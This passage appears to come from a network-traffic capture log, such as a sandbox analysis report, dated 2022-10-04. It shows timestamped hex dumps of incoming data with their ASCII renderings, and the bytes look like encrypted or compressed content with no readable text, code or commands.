                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25896INData Raw: 1b b6 3d a1 40 c3 81 fd a2 7b ee 50 e8 c1 24 e4 89 e4 05 e2 b1 ec 61 3a 7c 5b 10 60 35 33 51 b7 bd f2 91 e8 69 1f b5 32 43 b5 5b d1 4f da a0 bf 91 02 69 f2 94 e1 5b 66 8f 0a de 74 89 33 bc 04 b9 55 70 60 67 f2 52 69 4a 01 1a de b9 1a f5 19 63 ae aa 0b 5f 6b a4 06 8f 5e 1b 05 1c 9e 87 49 60 0d 3e 2f 51 85 e7 ea 7d 21 26 79 30 3f a0 21 17 e4 fa 4c fd 97 4e 11 9a 36 bb f4 0c 43 25 3f 3b 3c 1b 86 78 20 3d 5a ef d3 7b b1 00 30 3a 69 f6 12 8e 03 6f 97 25 49 d1 bb ce c5 47 f1 fd 14 34 c3 18 fb 25 24 8a 83 ef 27 69 bf c5 f0 10 0e 2a 8e 5d 43 a9 1d 15 4e c0 db 49 8e 77 92 23 8a 0f 9a 44 0e c6 95 93 d9 fe 41 ba ea ec 27 b3 c2 b2 62 9a 8d af eb ce 84 83 29 ea 71 c9 ec 8a d4 b8 8d 08 1a 4f 2c 6b 03 24 26 35 23 27 5b bb 95 dd 15 55 69 1c 75 2d 16 d5 1a 08 1c 57 15 0b
                                                                                                                                                                                                                                    Data Ascii: =@{P$a:|[`53Qi2C[Oi[ft3Up`gRiJc_k^I`>/Q}!&y0?!LN6C%?;<x =Z{0:io%IG4%$'i*]CNIw#DA'b)qO,k$&5#'[Uiu-W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25912INData Raw: 24 26 3c 30 20 9e af 22 bc 39 1a 29 85 ae 27 aa c8 62 df 3a 15 2e 21 36 ce 31 89 c0 e2 14 34 d5 dd 83 ad f1 4f d9 3c b3 66 04 0f 2c 31 c6 b8 d7 c4 20 64 df f4 60 72 62 41 f1 6f d2 7f 6c 97 b9 5e 79 47 6b 78 8d ff e9 cc 04 c6 08 d6 4c 49 ce 3c 64 93 2f 47 66 88 8f 13 3e be 49 6b 75 eb d2 35 56 7b 9c 01 1c 32 cc 46 30 a3 a9 02 ae a3 d1 16 ba c0 13 d1 10 0c ed 06 c7 11 e1 22 92 ca 51 23 ee 10 84 c9 02 0b dd c7 2e 4e 17 70 ce 43 34 dd a8 eb b3 32 92 88 a4 78 0e 3d 87 09 51 f7 05 d8 2a f2 56 2c 67 c3 64 cf 3f f1 9c e7 07 89 3d 00 fb 04 5b 70 9c e1 54 91 22 3b b6 16 12 44 bf 1f 9b 67 16 05 86 f7 61 b5 f1 ea 93 47 16 7f d2 48 82 b0 9d 00 64 f5 9f 4f cb a6 b9 bd b1 dc 71 36 18 24 e1 39 62 81 85 b0 3f c4 ab f3 1f da a3 ca a1 f2 8d 95 38 eb c3 e6 b6 87 f2 4a c6 a2
                                                                                                                                                                                                                                    Data Ascii: $&<0 "9)'b:.!614O<f,1 d`rbAol^yGkxLI<d/Gf>Iku5V{2F0"Q#.NpC42x=Q*V,gd?=[pT";DgaGHdOq6$9b?8J
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25928INData Raw: 85 91 90 4a 5c 70 8e 3e 1f b0 0f ee a5 3f 34 e4 25 3e cd ab 14 60 d4 d6 14 49 d0 51 46 5c eb 83 e5 2e 1d e6 15 cc 48 3d af 20 9c e1 90 45 6c 3a 1b 82 d1 c8 55 76 75 78 50 f9 40 27 d8 a9 c9 fb 4c d3 1a 23 41 23 7e be 5b f1 7d 75 f1 85 5c c4 80 87 42 28 25 b0 77 4d 0e b3 08 05 6c ec fb 35 11 33 a5 88 a3 c7 f4 3c f9 fe fe 5c 8b 2f 2b 52 95 64 a7 0d 83 8c 8b 4a f9 84 d7 20 58 5b ad 69 39 e6 34 f3 3e dc 07 b9 e3 3c 6f 59 94 c2 36 30 ba 9c 22 29 25 b9 5e 7d f0 9c ca 7c 56 16 e5 bb 3d bd 30 21 e4 c4 2c ac 10 2d 9d fa ba 20 02 35 f0 71 60 f7 c5 98 43 20 fb b3 d6 a3 b1 a4 f1 f9 7a 9a e0 8c 0f b0 08 a9 be dc 27 6c 78 19 c0 37 a5 2f 84 cc 32 a5 6b ce 23 d0 39 c2 6f 14 8f c0 3f c7 a2 dd 92 d1 ec 0f cb 9a c4 4c 4b f0 ae 08 0e 24 6d 02 77 3c b6 f9 14 63 ff 20 97 7c 2c
                                                                                                                                                                                                                                    Data Ascii: J\p>?4%>`IQF\.H= El:UvuxP@'L#A#~[}u\B(%wMl53<\/+RdJ X[i94><oY60")%^}|V=0!,- 5q`C z'lx7/2k#9o?LK$mw<c |,
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25944INData Raw: 7c ab f8 9f 86 85 91 ec 0e e3 fc cb 88 b9 6f f6 7d 5f 98 61 e9 a0 5a fa 07 87 1a 74 30 13 d6 b5 68 98 a1 17 69 63 9f 69 98 d0 32 2a 70 38 db 0e f5 57 3e 5c fa c7 54 2e e6 c2 52 7b 5d 53 79 af ed 89 bf aa 76 06 1c b1 87 8a 0d 3b 2d 49 dc 0b 9e 1e 35 ef f4 7b ab c5 78 29 a0 0d 94 7d 50 86 0d de f8 d1 a6 9b ec 91 c6 cd 5d 73 40 d0 62 b1 12 95 fd d5 bb b3 bb ba 7e c1 50 db 58 b6 3e 56 56 66 99 4b 09 5a 85 a5 37 fb f1 3d 01 70 8a 00 22 0b e0 c9 c1 f8 b4 9b 94 5e bb eb f3 2e 94 e8 6c cd bd 40 98 ec bf c4 71 03 c8 11 4d 2f a1 1a 64 79 f9 ed 12 fa 6d 0c b1 6f c4 8b 88 26 20 db b9 ce 24 6c 5a 1a 38 95 36 fd 08 44 b2 ec f8 dd cd 9f 3d 77 95 1b cc e1 60 0f c6 45 3b 91 85 a4 a0 2d c8 3e 5f 8c 40 8d d6 dc f8 9e ad 5c 32 97 5a bb a0 23 12 52 0c 16 c4 bd 50 ff 58 ad 91
                                                                                                                                                                                                                                    Data Ascii: |o}_aZt0hici2*p8W>\T.R{]Syv;-I5{x)}P]s@b~PX>VVfKZ7=p"^.l@qM/dymo& $lZ86D=w`E;->_@\2Z#RPX
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25960INData Raw: 68 d5 7d a5 af f2 76 93 47 fd 15 11 10 0a fe 6c b9 fe da 94 6a 55 cb 20 3c 9b 30 02 f5 40 d5 5f 3c ee 94 82 10 1f e0 54 0f 09 80 81 1f 5a cc 9e a1 e3 06 59 eb fe 16 55 91 63 9f 58 e2 df e4 a9 63 de 24 b6 c5 f7 06 b4 a6 d7 45 6d b4 ec 34 1b f0 c5 02 b0 7c 74 0e 80 27 86 c3 1f 3b c2 9e d8 a0 f7 82 75 c1 e8 1c be 0c 8a d6 68 3e 82 0a b2 1e 58 88 4c 1d b1 80 64 48 d3 e6 1a e6 28 8b 53 12 e4 f2 c7 d9 c5 e9 dc ab 49 78 0b 31 8e 0f d4 cb e8 c1 c5 6c f3 6d ca 5c 24 4c c9 ce 45 54 11 1d 67 ae 27 e2 6b 8d 48 7d 45 62 9a 97 0f 44 f7 9c b6 a6 db e6 d5 39 5b 97 77 a5 c5 4b 2c b3 f4 79 e6 99 27 33 f8 60 bb d3 1d 14 28 4b 8e 9e ee 61 4b 11 8a a0 5b 23 db b8 d6 93 c8 c0 46 e6 dc 6e a7 b0 d9 00 da 2f fc 22 f4 23 a8 2f 94 5a f4 4d 96 8e 87 57 9d 3a 19 e8 30 9e f9 80 71 6b
                                                                                                                                                                                                                                    Data Ascii: h}vGljU <0@_<TZYUcXc$Em4|t';uh>XLdH(SIx1lm\$LETg'kH}EbD9[wK,y'3`(KaK[#Fn/"#/ZMW:0qk
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25976INData Raw: 1a 9e a5 6f 5e cd 3e 0a da df 58 70 c1 c1 47 48 a5 85 cb e8 db f1 52 c0 ab 93 6d b8 11 a9 90 59 d8 23 b0 35 65 6d 16 4b 8b d4 c5 37 89 7a 09 3e 99 46 d7 8f 3a 4a 1b 29 15 99 6f 35 c5 62 2f f0 f5 22 54 2a b9 2a 71 f0 38 eb 42 c3 1b 91 d2 3a 2a 75 62 56 b6 88 27 3d bd cb 0f 5b cc 63 93 58 90 81 f7 eb 2e 97 0b b2 d1 e9 38 49 da 7c 8e 3c bc dc 8a 4e 40 aa eb 40 b5 c3 57 c9 8d 11 36 b2 82 f5 ea 7a 52 7f 05 5d c0 20 50 68 62 84 b5 77 83 3c 6a 71 c8 4e f5 68 fb 6c a0 d1 1b ab ec 7f 38 a3 a0 76 4f c7 e5 e8 34 95 dc f4 6e a4 96 93 2f 87 de c3 df 2b e8 9c 65 9f 6a ac c9 22 d6 aa 07 91 d0 58 d3 a1 78 25 31 dc 01 5c d6 e6 bb 4a 3a 86 c2 96 bc 05 5e 85 43 51 17 21 20 c9 2f da df 45 27 9a 9c ea c2 2d db b0 16 db 0e 8d 49 b5 c6 1b bd 82 ca 2c 2b 82 6a cd c1 c3 53 60 f2
                                                                                                                                                                                                                                    Data Ascii: o^>XpGHRmY#5emK7z>F:J)o5b/"T**q8B:*ubV'=[cX.8I|<N@@W6zR] Phbw<jqNhl8vO4n/+ej"Xx%1\J:^CQ! /E'-I,+jS`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC25992INData Raw: 22 f1 31 84 11 73 5f 18 63 18 3f 85 b3 7b ba 3c 5a e7 52 d2 b0 4b 79 33 0e 32 2c 1e b4 ef 0d 43 29 6e eb 43 d2 86 c2 d2 37 61 35 61 50 7b 94 be 54 f8 18 93 32 2c 6b 13 2f fb 6c 2f 29 ce 98 f8 cd 9a 55 a2 76 49 bf 6d 88 aa 92 38 c2 bb 78 21 14 c0 82 fb cd d9 38 e0 8f 3b c4 56 a0 98 dd 33 5b 73 1a 25 0c d2 42 19 8d 8b 6d c4 51 d6 d2 f1 83 a9 f7 ac 34 36 60 1a c7 89 68 7b c5 dc 9b b4 65 20 67 61 12 ad 81 b3 ff 23 4e c9 c9 c9 bb bf 5b 3e cb 96 3c 4c 67 8f 05 da 42 81 5d 5e 55 22 7d 56 11 e1 d0 be a5 68 45 d7 b9 c7 4c 3a 6d ae 87 e5 3d 4e b1 e9 81 c7 8d 11 9a 1a 92 7c 84 e5 c5 6f 8a e0 5d 5b 7b 78 f3 e7 fd 57 ac e3 39 64 6a d5 02 e3 b0 c2 9b af 96 2b 4b bf 8d a3 69 5b f6 0a 3a 2f 9d bd f3 54 9b ec d8 a4 a0 ee cb 29 85 0c 66 a5 89 05 7a 4e 4e c4 4a d3 95 13 71
                                                                                                                                                                                                                                    Data Ascii: "1s_c?{<ZRKy32,C)nC7a5aP{T2,k/l/)UvIm8x!8;V3[s%BmQ46`h{e ga#N[><LgB]^U"}VhEL:m=N|o][{xW9dj+Ki[:/T)fzNNJq
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26008INData Raw: 4d cd e9 eb 60 b6 dc 50 05 1b b7 22 a3 b1 c7 4b cd 25 5d 1d bd 6d 23 cd e6 92 40 1f 2b 96 e9 24 c1 d2 98 a3 da fd f2 73 58 ba ed 41 a5 1b b7 99 64 41 eb 31 db 26 d7 ed ef dd 4a fd 85 52 03 45 dc bf 13 2a c5 59 a8 56 bd bb 4f f6 8d 60 11 72 2f ba d2 e4 aa 0b b0 c2 fe 8e b6 be 31 1f 86 f4 08 af 22 f1 5e 17 bb 85 20 f4 29 51 2c 1c a0 00 ee 34 18 9c 12 c7 d1 5c 9a b5 18 7b e1 07 3a ff 1c 60 ff ba d7 30 a6 a3 1b 54 56 c1 f2 52 16 a1 75 89 09 80 e2 69 5f 1d 9d 49 09 52 69 44 6d 84 db 2a f0 4a 42 f3 a4 07 7e 92 9e 6a 89 6d f7 93 a1 a0 cf 8d 68 5c 7e 03 23 7b 04 ac 3e cf 2c c9 1a 9e 9c 7f 03 b9 fb ee f0 89 2f 2a 10 f6 4b 32 46 87 64 27 67 91 50 6c 0b 18 4a 34 76 71 1c 61 cc f6 31 4d de ee 71 17 f0 13 66 f1 cd a7 9e 4d 60 d5 6d 32 99 03 f9 81 bf 16 5a b4 24 ae 69
                                                                                                                                                                                                                                    Data Ascii: M`P"K%]m#@+$sXAdA1&JRE*YVO`r/1"^ )Q,4\{:`0TVRui_IRiDm*JB~jmh\~#{>,/*K2Fd'gPlJ4vqa1MqfM`m2Z$i
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26024INData Raw: 61 3f 40 34 2c 3d c2 65 96 70 43 9b b3 7b 73 78 e4 8e 0b d8 38 fd 2a 97 4f 98 ae 34 55 40 9d 62 a0 b0 95 2a 1a 9f 19 ad 52 3f 55 90 78 f6 8a cc de 2d 9b 40 36 fa 1a e0 b9 54 02 d2 fe 87 93 68 68 71 82 1c e9 b6 a4 11 d1 ff 3c 96 49 c6 2a 8e 9b 58 4d b2 de 24 2b d2 1d f7 73 d7 11 0d 9b 98 56 fa ef 7c 14 d0 18 37 0c 23 ea 6b 3c ad fc a4 14 4f 57 9e 00 af 12 ea 28 70 d2 a1 0b a9 f0 42 28 48 00 96 17 dc f2 64 1b e0 af 49 eb e1 5e 94 12 7b 1c 22 aa c7 09 c4 c1 39 89 ea 7d c4 22 9b e7 bf 71 cc a8 a0 29 10 67 ab b1 d0 53 89 f4 bc 7f 40 c0 74 2d 77 38 65 a9 af da 54 fa 75 d6 12 1b d9 9b c4 52 de 8b 84 16 45 69 53 f9 45 97 97 f3 f7 3e 29 e6 16 36 69 a9 18 1d 92 c7 50 53 f6 cc f0 e7 8e 5b b4 9e 17 e7 d0 fb 8c 26 7b 94 52 1b a4 2d cb d0 16 4b 6d 85 4d 90 9e 3c 94 25
                                                                                                                                                                                                                                    Data Ascii: a?@4,=epC{sx8*O4U@b*R?Ux-@6Thhq<I*XM$+sV|7#k<OW(pB(HdI^{"9}"q)gS@t-w8eTuREiSE>)6iPS[&{R-KmM<%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26040INData Raw: 45 2a ef 18 0c 34 8a bd 07 bb 56 9d b1 4f 07 d2 a5 67 57 08 dc 73 4c 13 01 55 bc ad 31 2b 37 1a 54 ac 15 65 61 75 9d 00 bd a2 6f 71 85 30 3d ca ac 13 ca 6f 53 7e 44 af 5d 1e c0 d8 0c 38 0d 7a 9f a1 9b 46 e7 e6 8b b9 d0 34 d9 cb 3d aa 8f 3a 8c bb f1 d4 e6 76 b4 01 2a 62 bc 9f 62 f8 bd f5 fa 49 13 6d 56 a5 6a 28 e8 26 0e 14 eb 43 74 9d 3d 20 c6 7b 79 12 ae f1 e6 c7 26 a0 3b 52 3a c8 bc 1b f1 0f cc 4a 3e 24 0d 44 93 de 22 1e dd 8d f2 d5 a9 21 af e8 02 a0 8c c8 26 b1 89 cf dd 7c 20 8f 61 81 79 56 01 5f b5 7b bc ff e7 6e 3c e2 5a eb 1d e1 5c 45 80 85 f6 47 f4 5e ff 63 cc 70 5a ea fa 3b 1f ce 2d da 90 8a ef 2d 3b 0b e5 1e 58 72 3e 2f 70 2b 7c bd ed fa 18 7a a7 d4 12 ea df 22 86 b3 58 da 01 22 11 cc bb ba 68 62 12 9a fe 16 49 88 3f a3 96 81 f3 d6 bd 50 2c bf 72
                                                                                                                                                                                                                                    Data Ascii: E*4VOgWsLU1+7Teauoq0=oS~D]8zF4=:v*bbImVj(&Ct= {y&;R:J>$D"!&| ayV_{n<Z\EG^cpZ;--;Xr>/p+|z"X"hbI?P,r
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26056INData Raw: b4 05 b5 82 df 43 02 7a 69 bf 46 83 36 05 25 52 a4 5d 9e 15 2d ed cc 42 f8 ea 9b c9 b0 71 d9 da 5f c4 09 8c be c6 b9 71 b0 65 a0 4f 6a b1 51 d5 d0 13 1d e3 5e 01 4d 6f 17 f2 4e c0 0b 1e ba f8 8e d0 bc ab 29 22 5c 94 d3 e6 af ef 7e 39 77 56 06 38 6d 47 cf c0 d5 17 99 9d e8 9d 6d e0 d5 04 22 b7 df ce fb 8d bd 8a 8c 03 2f eb d3 4a 0c 92 ba 69 5f b7 a3 73 5a 1d 06 6f fa 9a 11 76 00 b5 1e 21 96 91 16 67 4a b6 7c a0 1b 11 42 a3 03 6a c0 8b 2f 1d 4b 88 91 bd a6 27 3e 86 df f8 4a 79 8e 01 0e d5 0f 9e 03 6d b2 4c a2 26 21 da 84 ca b1 42 ee 3b c6 41 85 81 ed 4f 88 37 86 72 0e fd a5 fc 05 00 82 f9 72 9d 17 c2 52 c6 c7 15 a2 5c 08 06 f7 7f 4c 78 d6 6a 1c 6d 55 2e aa 12 6c 1e 06 f2 b6 e8 77 d3 4b 9e d1 e0 8c fe b8 4a d0 98 8e d6 f1 68 e7 4b 08 37 d1 c7 13 46 79 f2 14
                                                                                                                                                                                                                                    Data Ascii: CziF6%R]-Bq_qeOjQ^MoN)"\~9wV8mGm"/Ji_sZov!gJ|Bj/K'>JymL&!B;AO7rrR\LxjmU.lwKJhK7Fy
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26072INData Raw: 4b af d1 02 0f 4e 2d ff 16 81 fa f4 9d fb c8 ac cf 55 aa 5d 64 bd 65 39 02 46 6f 93 b4 6f 8a 1d 4a 34 24 ff df b1 3d 72 60 dc 8a b0 b0 8d 0b c1 b0 11 3a 02 74 9d a6 b8 66 90 cc a1 1f e1 70 71 91 8f 88 df 02 f2 08 44 9a 08 30 50 9a 0f 28 6e ce 6b e4 2c 48 7b 41 16 68 de 08 8c b8 30 46 18 57 d2 b5 98 c4 ba 2a be 72 b6 22 eb bc 2a 52 e4 c4 09 36 56 8d 13 73 12 53 7a 63 81 22 35 3f 72 a1 a2 43 bc d6 63 ad 07 ac 6e 61 7d 5e 66 ae 55 ed 18 65 fd 06 93 e2 75 10 27 cc 75 8a e3 b0 2c ed f5 ef 87 39 1d c8 4e fe f9 20 4b d7 a0 50 cd 63 5d e0 12 50 ee e7 cf 06 64 c7 20 81 e8 33 e7 f5 be 35 b0 cd 93 70 a2 1f ee e4 f9 70 19 9d 4a 8d 82 e0 7b db 42 a0 ad 6f ba 5f cd c1 33 f7 54 81 2d f9 f9 db 22 e9 e0 c4 21 4f df 68 cc 69 3b da 46 e3 62 42 43 3b 41 36 76 00 4a bf 26 04
                                                                                                                                                                                                                                    Data Ascii: KN-U]de9FooJ4$=r`:tfpqD0P(nk,H{Ah0FW*r"*R6VsSzc"5?rCcna}^fUeu'u,9N KPc]Pd 35ppJ{Bo_3T-"!Ohi;FbBC;A6vJ&
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26088INData Raw: b7 9d fe ef 40 2b 57 51 57 56 1d f5 f0 6b 1b ec 58 f4 d7 41 f0 1e cb 9a c5 34 37 0e 3f 08 53 8b ac 89 30 de b3 3c 18 e2 06 a6 6e 77 c2 29 11 d8 8f 2a e2 bb 5b de 5e dc f1 fe e2 0a 22 f9 c1 ab 62 b1 92 97 80 0b e5 9a 92 1d 48 24 7c f2 e1 52 7b 45 02 39 6e a9 e4 3b 2a 4d 7a 98 90 2b fc 37 9f 2a f5 1a 22 8c 0a 11 10 91 4f c6 6d 29 12 e6 8b 18 a0 4f 23 d3 b8 ad 24 22 cc fc 0a 70 0f 72 94 0a 56 f0 f0 d8 05 77 bd 35 71 86 55 c5 ea dd a0 d3 6f 07 dd d9 f3 4e 4c f7 0f 2e c8 4c 60 a4 9f c7 81 b8 98 0e f7 52 29 e4 a0 ef 69 3a a4 7f 12 ec 3c d0 7b 54 41 cd a5 1a f8 39 0b 26 5d 75 d1 e4 43 13 7a bd c5 e2 54 88 9e 72 dc 50 f7 5d 01 98 db 36 4b 2e 71 df d1 69 b8 75 4b 6d 19 de 04 97 95 51 5f 43 4e 95 2c 7d bd 2c 7c 9d a8 e9 32 b9 a2 a8 97 51 1b 2f 23 d9 09 57 41 fc c6
                                                                                                                                                                                                                                    Data Ascii: @+WQWVkXA47?S0<nw)*[^"bH$|R{E9n;*Mz+7*"Om)O#$"prVw5qUoNL.L`R)i:<{TA9&]uCzTrP]6K.qiuKmQ_CN,},|2Q/#WA
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26104INData Raw: 61 26 47 ff 99 d7 29 b1 09 a5 88 74 32 41 f0 2e 01 29 7c 79 59 5f 4d c3 ac 48 bc 7e 26 d3 f1 e2 a5 1d 55 25 1f f2 b3 a7 ab 61 53 b5 8c f1 40 ec 1e 91 9c 37 c0 3e 14 81 63 94 fa 2e f0 58 f0 9f 1e c8 bd d5 c6 68 fb d1 83 41 5d cf 5a ff 96 db 6d 8a ee 73 70 0f 08 12 e0 7d f0 b2 79 ee 46 f8 17 14 d1 da 41 9e 58 92 7c 53 0c ad 61 75 4b 74 2e f2 6f 3a f2 48 62 16 fd 79 11 41 2f 7b 35 0b c6 f0 9f e6 8c 29 50 12 16 b5 de b0 35 3a db 3e b1 7b 6b 7a 86 8b a3 69 fe e6 9f 0b 3d 47 69 39 d6 00 3d ab 3e 54 f7 94 b0 e3 7f 0d 9f df 87 9d 43 62 5e af 95 17 91 5f 6c 3d 64 2d 1d 04 21 29 50 e8 2a ae 3b 9f 58 9e e3 48 16 46 52 73 f2 f4 5a 53 22 c0 53 47 24 8f ea be cf 55 56 c9 23 f0 ff c5 fe 1c 0a 22 17 64 23 49 4b 74 b1 6d fb f4 c2 13 d3 ee b3 72 e8 e4 35 48 bf c8 51 b0 3b
                                                                                                                                                                                                                                    Data Ascii: a&G)t2A.)|yY_MH~&U%aS@7>c.XhA]Zmsp}yFAX|SauKt.o:HbyA/{5)P5:>{kzi=Gi9=>TCb^_l=d-!)P*;XHFRsZS"SG$UV#"d#IKtmr5HQ;
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26120INData Raw: 38 f1 d2 bb e4 c0 ff dc bf a4 b6 06 f8 85 38 0a af 97 77 55 92 a9 2d 6e 54 11 08 28 e4 2a 3a aa a1 68 12 b0 bd 7b 43 6d b0 db 9e e0 8c de 13 ac b1 98 bd 73 71 50 a3 91 07 7d 52 94 08 dd 0d a1 22 ea d3 32 9a e5 4d 89 28 e7 47 a0 78 a2 03 99 08 23 8f a9 c4 f0 a4 72 6a 48 a0 d7 7b e6 02 2f 1a 52 21 96 19 f6 9b f3 03 bd 4c 3a 68 bf 78 23 76 92 21 36 f1 5d 84 83 26 c2 35 ea 76 8e 2d df 03 ee 5d f9 1e 13 d8 ce ab 23 36 2b 35 69 fb 04 1a 3e 21 ef fa 7b 7f 03 5d 6e 5d 02 e5 e5 22 c9 56 9f 99 25 57 1e f3 d3 25 0e 97 b6 8b 8c 58 28 96 e2 76 07 90 f8 2f 8c 23 63 63 8a fc d0 5d e6 e3 3e 61 5e 22 20 eb be 92 57 a6 13 f2 d7 a9 48 17 c8 66 be 87 04 40 65 ff 76 e6 0e a6 56 5f 4f 3c c9 3e 3c a0 c7 ca b3 86 f3 05 78 2e e1 1c 79 95 27 7e 6b 83 d4 70 a5 11 5b 56 f6 4c 4c 7f
                                                                                                                                                                                                                                    Data Ascii: 88wU-nT(*:h{CmsqP}R"2M(Gx#rjH{/R!L:hx#v!6]&5v-]#6+5i>!{]n]"V%W%X(v/#cc]>a^" WHf@evV_O<><x.y'~kp[VLL
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26136INData Raw: 64 72 bf 32 b0 3e 13 25 a5 37 dc d2 0c a6 50 69 e3 2d 6e 31 b6 0c cc 39 b1 f9 5b 85 b4 5a 4a 5d a2 67 35 74 4d 99 1e 74 7f 51 8c 3e 5d f7 62 a1 fe 4c 66 77 02 9b 28 bc 5e 69 7f 88 c4 1e 66 6b e3 f1 12 ad 3c 62 82 10 3a 25 2d 10 5e d4 fe 42 0c f9 5a 57 c9 21 b5 d2 cb 91 2b 4a ce ea 4d 4d 2d 0b 1b 34 7d 9e 02 12 ce 4a 1c f0 30 6e 7c 39 f3 32 66 8d 2f 04 8f ab 43 01 0c 41 48 72 f9 a7 2b bb 86 0a 86 77 7c 0e 55 18 d9 48 48 af 73 7b 9f 75 06 60 77 e7 71 e1 9f 78 70 84 06 d4 04 6b db 9b 20 4d e1 9b dc 42 c9 64 8e 9e 0c 89 eb 9e de cc 4b 8f 6a d8 f9 71 01 86 07 de 70 a3 2c a9 6d 37 60 7c 78 ba 42 a2 a7 dc 88 13 92 5c fd 3f a2 f3 bd 98 0a 30 9e 4c fe 60 c2 cb e4 93 9b 80 51 86 a2 e3 66 81 96 5a 37 44 d1 15 7a 2e d0 c2 44 d0 8b 51 e9 22 0b 2c 64 55 a0 88 b8 19 2a
                                                                                                                                                                                                                                    Data Ascii: dr2>%7Pi-n19[ZJ]g5tMtQ>]bLfw(^ifk<b:%-^BZW!+JMM-4}J0n|92f/CAHr+w|UHHs{u`wqxpk MBdKjqp,m7`|xB\?0L`QfZ7Dz.DQ",dU*
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26152INData Raw: 51 05 97 30 c6 78 e2 47 03 33 82 45 33 06 4a 59 e4 63 ed e1 23 ee 1d 8c 21 8a 2c 74 4f a8 5a 54 e4 f2 06 93 f8 4b 10 f6 be 7d 48 7f 4b 5f a3 ad 87 79 01 97 1d 47 85 72 4d 7b 23 1c db 84 0d 76 84 63 6c d4 12 23 20 06 25 17 da 65 5f 38 44 e7 65 ed a1 e9 63 8e de 51 8c f1 b0 01 26 47 5d 47 9a db fc ec 6b 51 6b b2 3b 7a 49 59 36 61 68 97 a5 3c 38 d0 89 82 d8 cc 12 18 89 ef 6f 2b 4e 20 78 f4 f0 e1 cd f9 16 75 52 0f d3 4b 71 7a e4 74 dd c8 c2 0d 05 84 8b 58 07 ef 04 6e 6d 27 1a 87 f1 48 87 08 70 4d 47 64 41 e3 67 52 fd ae ab a0 ac 8c 48 f7 11 50 2c 6e c2 33 8c 7b f4 d8 6a 29 fd f2 84 b3 f7 a1 b6 6e ee 02 ad e8 42 54 c3 25 89 69 8a b5 b2 27 8f 03 1b 3a fb 3b f5 74 bd 47 c0 36 25 f1 7e 3f fe 45 22 1b 69 af a4 60 68 cf 6d ce 01 39 95 bb 07 7f 51 a1 a1 82 88 5f 57
                                                                                                                                                                                                                                    Data Ascii: Q0xG3E3JYc#!,tOZTK}HK_yGrM{#vcl# %e_8DecQ&G]GkQk;zIY6ah<8o+N xuRKqztXnm'HpMGdAgRHP,n3{j)nBT%i':;tG6%~?E"i`hm9Q_W
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26168INData Raw: 46 55 31 09 f7 13 2d ca c0 18 8d 67 cd c0 d6 4b 6f 43 40 b7 57 60 90 e3 a9 58 8a eb c6 02 9b bc 4b 4a 27 70 bb df ba 7c d3 0c fa ea 15 9e 9a ea fb 8d 4e 8b 34 65 86 c4 11 da 6b a5 71 62 44 e7 bf 26 df d7 73 8b 48 16 2f 0f 67 1e 88 db 9f 95 13 69 e1 8d f0 4f 70 8f 96 3a 5e 57 d0 ad 0e ab 99 af 23 40 b2 10 1c 64 67 e4 a5 80 fa fb ff 8f 9c fe 2c 4d 1c 22 46 c7 50 77 2c 65 6d b8 bb 6a f7 b5 2c f5 e7 1e 0f 09 4d 58 91 86 87 86 90 5b b4 e5 32 5b 5b 48 14 53 26 a7 97 a1 9a 6c c0 19 ed fb dc b6 cc 07 f5 73 a5 50 fe 54 a4 d6 00 eb 2d 88 76 ae ab b9 5d 6c 37 c4 3f 97 ae e1 31 f6 1a b4 f4 56 78 39 c6 31 45 10 94 a7 d5 6b b2 5b b6 4f 05 0d 70 04 35 3f d1 71 2c 27 d4 d9 ee 91 8d e0 c3 c5 0d f8 e5 98 56 3d 3e 83 16 fd b3 18 d8 c3 27 fd 40 86 20 e4 23 3a 10 86 02 79 9b
                                                                                                                                                                                                                                    Data Ascii: FU1-gKoC@W`XKJ'p|N4ekqbD&sH/giOp:^W#@dg,M"FPw,emj,MX[2[[HS&lsPT-v]l7?1Vx91Ek[Op5?q,'V=>'@ #:y
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC26184INData Raw: 2c 58 d1 bd 8f 12 1b f7 2e 63 8d 0f 83 05 2a 6b 56 26 7b 0d 94 50 81 f5 f1 bf 6b 6b 8d 6c 52 fd 2a 2f d1 73 bd 0a 85 09 e9 96 3e 70 75 9e dc 0f 7d 26 37 e3 2f 6f df 44 27 49 95 74 2f 72 42 0d 77 66 75 95 bb 37 4e 38 f5 88 14 6c 12 a2 fb 5d 89 c8 f3 d3 88 ad 3f 53 87 28 e0 29 d2 f8 6a d0 41 1a ff 5f 1a e7 ef 58 13 06 df 89 0e a1 22 0b 4b d4 84 85 f6 05 eb 03 61 68 8a 14 30 d5 a9 17 91 f7 9c 1f ea 73 2e 15 86 3e 5f 09 02 60 b4 d1 13 00 9f fd b1 38 be ca e6 b4 76 06 66 50 13 6a 73 8c 35 e5 f6 e9 b9 40 bf 33 7e 3d da 5e 1a f8 9c 27 d7 2a 21 db 87 81 17 7f 04 01 9d 2c 6d 3a f5 e4 35 ae 2f d5 3e 3d 72 f3 93 11 ba c5 1d 22 45 42 68 9f b8 09 d9 88 d4 93 39 04 51 eb e8 dc f8 28 98 22 3d 9c 10 6b 7b 2f 30 64 84 ed 6d 82 23 04 be b5 08 01 71 18 bf 55 ed fc 1d 8e 87
                                                                                                                                                                                                                                    Data Ascii: ,X.c*kV&{PkklR*/s>pu}&7/oD'It/rBwfu7N8l]?S()jA_X"Kah0s.>_`8vfPjs5@3~=^'*!,m:5/>=r"EBh9Q("=k{/0dm#qU
